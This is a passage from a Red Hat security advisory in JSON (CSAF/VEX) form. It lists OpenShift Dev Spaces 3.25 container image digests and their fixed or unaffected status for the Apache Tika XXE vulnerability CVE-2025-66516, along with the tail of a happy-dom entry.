"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "happy-dom: Happy-DOM VM Context Escape"
},
{
"cve": "CVE-2025-66516",
"cwe": {
"id": "CWE-611",
"name": "Improper Restriction of XML External Entity Reference"
},
"discovery_date": "2025-12-04T17:01:38.159055+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418870"
}
],
"notes": [
{
"category": "description",
"text": "A XML External Entity (XXE) injection vulnerability was found in the Apache Tika framework\u0027s PDF parsing functionality. It could allow a remote, unauthenticated attacker to exploit the system by providing a specially crafted PDF containing an XFA (XML Forms Architecture) file. This flaw could lead to sensitive information disclosure or, potentially, Remote Code Execution (RCE) on the server. The issue affects multiple Tika modules, including tika-core, tika-pdf-module, and tika-parsers, within the version ranges 1.13 through 3.2.1.\n\nThis CVE expands on the scope of CVE-2025-54988 to clarify that the root cause and required fix reside in the tika-core module, regardless of which parser module is used.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "tika-core: tika-parsers: tika-parser-pdf-module: Apache Tika core, Apache Tika parsers, Apache Tika PDF parser module: Update to CVE-2025-54988 to expand scope of artifacts affected",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Critical because it can be triggered when Apache Tika processes a maliciously crafted XFA file embedded within a PDF. Successful exploitation enables XML External Entity (XXE) injection, allowing an attacker to access sensitive local files and initiate arbitrary requests to internal or external network resources. This can lead to Server-Side Request Forgery (SSRF), data tampering, and potential elevation of privileges. With high impact across confidentiality, integrity, and availability, this vulnerability poses a severe risk to affected systems.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
